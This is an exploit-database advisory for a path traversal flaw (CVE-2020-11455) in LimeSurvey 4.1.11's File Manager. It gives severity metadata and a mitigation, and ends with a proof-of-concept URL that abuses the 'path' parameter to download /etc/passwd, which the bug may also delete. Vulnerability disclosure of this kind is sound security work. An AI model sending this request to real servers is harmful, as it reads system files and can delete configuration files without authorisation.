LimeSurvey 4.1.11 - 'File Manager' Path Traversal

vendor:

LimeSurvey

by:

Matthew Aberegg, Michael Burkey

9.8

CVSS

CRITICAL

Path Traversal

CWE

Product Name: LimeSurvey

Affected Version From: LimeSurvey 4.1.11+200316

Affected Version To: LimeSurvey 4.1.11+200316

Patch Exists: YES

Related CWE: CVE-2020-11455

CPE: a:limesurvey:limesurvey:4.1.11+200316

Metasploit: https://www.rapid7.com/db/modules/auxiliary/scanner/http/limesurvey_zip_traversals/

Other Scripts: N/A

Platforms Tested: Ubuntu 18.04.4

2020

LimeSurvey 4.1.11 – ‘File Manager’ Path Traversal

A path traversal vulnerability exists within the 'File Manager' functionality of LimeSurvey that allows an attacker to download arbitrary files. The file manager functionality will also delete the file after it is downloaded (if the web service account has permissions to do so), allowing an attacker to cause a denial of service by specifying a critical LimeSurvey configuration file.

Mitigation:

Ensure that the web service account does not have permissions to delete files.

Source

Exploit-DB raw data:

# Exploit Title: LimeSurvey 4.1.11 - 'File Manager' Path Traversal
# Date: 2020-04-02
# Exploit Author: Matthew Aberegg, Michael Burkey
# Vendor Homepage: https://www.limesurvey.org
# Version: LimeSurvey 4.1.11+200316
# Tested on: Ubuntu 18.04.4
# CVE : CVE-2020-11455

# Vulnerability Details
# Description : A path traversal vulnerability exists within the "File Manager" functionality of LimeSurvey
# that allows an attacker to download arbitrary files.  The file manager functionality will also 
# delete the file after it is downloaded (if the web service account has permissions to do so), 
# allowing an attacker to cause a denial of service by specifying a critical LimeSurvey configuration file.
Vulnerable Parameter : "path"


# POC
https://TARGET/limesurvey/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd